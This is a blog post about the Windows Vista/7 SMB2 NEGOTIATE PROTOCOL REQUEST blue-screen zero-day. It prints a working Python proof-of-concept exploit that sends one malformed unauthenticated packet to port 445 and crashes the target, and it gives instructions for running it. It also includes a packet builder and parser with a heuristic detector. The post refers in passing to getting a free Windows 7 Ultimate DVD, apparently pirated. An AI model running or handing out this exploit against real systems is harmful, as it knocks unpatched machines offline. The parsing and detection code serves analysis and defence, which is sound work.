Windows Vista / Windows 7 SMB Remote REQUEST 0 day!

by Black on September 8, 2009 · 0 comments

in Open Source, Security Reconnaissance, Security tools, Source Code, Windows

A Windows Vista / Windows 7 SMB remote NEGOTIATE PROTOCOL REQUEST zero-day vulnerability has been discovered by Laurent Gaffié.

In our previous post we showed how to get a free Windows 7 Ultimate DVD; here is a new zero-day vulnerability for it.


Name of vulnerability – Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

How does it work?

SRV2.SYS fails to handle malformed SMB headers in the NEGOTIATE PROTOCOL REQUEST.
The NEGOTIATE PROTOCOL REQUEST is the first SMB message a client sends to an SMB server; it is used to agree on the SMB dialect that will be used for further communication. The proof of concept below sends an otherwise ordinary negotiate request (offering "SMB 2.002" as the last dialect) in which the Process ID High header field, normally 0x0000, contains the byte 0x26 ("&"). The server's SMB2 driver faults with PAGE_FAULT_IN_NONPAGED_AREA and the machine blue-screens; no authentication is required, only TCP port 445 reachable on the target.

A python script (source code) proof of concept

#!/usr/bin/env python3
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
# it dies with a PAGE_FAULT_IN_NONPAGED_AREA

import sys
from socket import socket

# Target: pass the IP address on the command line, or replace the placeholder.
host = (sys.argv[1] if len(sys.argv) > 1 else "IP_ADDR", 445)
buff = (
    b"\x00\x00\x00\x90"  # NetBIOS session message: 0x90 = 144 bytes of SMB follow
    b"\xff\x53\x4d\x42"  # Server Component: SMB
    b"\x72\x00\x00\x00"  # Negotiate Protocol (command 0x72), start of NT status
    b"\x00\x18\x53\xc8"  # end of NT status, Flags 0x18, Flags2 0xc853
    b"\x00\x26"          # Process ID High: --> :) normal value should be "\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"  # signature, reserved, TID, PID
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"  # UID, MID, WordCount 0, ByteCount 109, dialects
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    b"\x30\x30\x32\x00"   # last dialect offered is "SMB 2.002"
)
s = socket()
s.connect(host)
s.sendall(buff)
s.close()
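To make the header layout concrete, here is an added example (written for this post; it is not Laurent Gaffié's code and not part of the original PoC) that assembles the same 144-byte negotiate request field by field with struct, and parses such a message back so the Process ID High value and the offered dialects can be read off, for instance from traffic captured on port 445. The is_suspicious check is an assumed heuristic based only on the PoC's note that the normal Process ID High value is 0x0000. Nothing is sent on the network.

```python
#!/usr/bin/env python3
"""Build and decode the SMB1 NEGOTIATE PROTOCOL REQUEST used by the PoC.

Added example for this post, not Laurent Gaffie's code. It assembles the
same 144-byte negotiate message with struct so every header field is named,
then parses such a message back so the "Process ID High" field and the
offered dialects can be inspected. Nothing is sent on the network.
"""
import struct

SMB_COM_NEGOTIATE = 0x72

# Dialects offered by the PoC, in the same order.
DIALECTS = [
    "PC NETWORK PROGRAM 1.0",
    "LANMAN1.0",
    "Windows for Workgroups 3.1a",
    "LM1.2X002",
    "LANMAN2.1",
    "NT LM 0.12",
    "SMB 2.002",
]

# SMB1 header, 32 bytes, little-endian:
#   4s protocol id (0xFF 'S' 'M' 'B')   B  command        I  NT status
#   B  flags                            H  flags2         H  process id high
#   8s security signature               H  reserved       H  tree id
#   H  process id                       H  user id        H  multiplex id
HEADER_FMT = "<4sBIBHH8sHHHHH"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 32


def build_negotiate(pid_high=0x0000, dialects=DIALECTS):
    """Return a NetBIOS-framed SMB1 NEGOTIATE request.

    pid_high is the 16-bit "Process ID High" field. 0x0000 is the normal
    value; the PoC's bytes 00 26 read as 0x2600 little-endian (the 0x26 is
    the '&' the PoC comment refers to). Other field values match the PoC.
    """
    header = struct.pack(
        HEADER_FMT,
        b"\xffSMB", SMB_COM_NEGOTIATE, 0, 0x18, 0xC853, pid_high,
        b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0,
    )
    # Each dialect is a BufferFormat byte 0x02 plus a NUL-terminated string.
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    body = struct.pack("<BH", 0, len(data)) + data  # WordCount 0, ByteCount
    smb = header + body
    return struct.pack(">I", len(smb)) + smb  # NetBIOS session message header


def parse_negotiate(msg):
    """Decode a NetBIOS-framed SMB1 NEGOTIATE request into named fields."""
    (nb_len,) = struct.unpack(">I", msg[:4])
    smb = msg[4:]
    if nb_len != len(smb) or len(smb) < HEADER_LEN + 3:
        raise ValueError("bad NetBIOS length or truncated SMB header")
    (proto, cmd, status, flags, flags2, pid_high, _sig, _rsv,
     tid, pid, uid, mid) = struct.unpack(HEADER_FMT, smb[:HEADER_LEN])
    if proto != b"\xffSMB" or cmd != SMB_COM_NEGOTIATE:
        raise ValueError("not an SMB1 NEGOTIATE PROTOCOL REQUEST")
    word_count, byte_count = struct.unpack("<BH", smb[HEADER_LEN:HEADER_LEN + 3])
    data = smb[HEADER_LEN + 3:HEADER_LEN + 3 + byte_count]
    dialects = [d[1:].decode("ascii", "replace") for d in data.split(b"\x00") if d]
    return {
        "status": status, "flags": flags, "flags2": flags2,
        "pid_high": pid_high, "tid": tid, "pid": pid, "uid": uid, "mid": mid,
        "word_count": word_count, "byte_count": byte_count, "dialects": dialects,
    }


def is_suspicious(msg):
    """Assumed heuristic: flag a negotiate whose Process ID High is not 0x0000."""
    return parse_negotiate(msg)["pid_high"] != 0


if __name__ == "__main__":
    for label, msg in (("normal", build_negotiate()), ("poc", build_negotiate(0x2600))):
        fields = parse_negotiate(msg)
        print(f"{label}: {len(msg)} bytes, pid_high=0x{fields['pid_high']:04x}, "
              f"suspicious={is_suspicious(msg)}, dialects={len(fields['dialects'])}")
```

build_negotiate(0x2600) reproduces the PoC's buffer byte for byte (148 bytes including the 4-byte NetBIOS header), so the parser can be pointed at either the script's output or at a packet capture to confirm which field differs from a normal client's request.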

Save the script as a .py file and run it with the target's IP address as the first argument, only against a machine you are authorised to test: the target blue-screens and reboots.

The attacker can run any operating system; only the target has to be Windows, and one unauthenticated packet is enough to crash it.

Systems affected:
Windows Vista / Windows 7, all editions (32-bit and 64-bit, SP1/SP2, fully updated), and possibly Windows Server 2008.


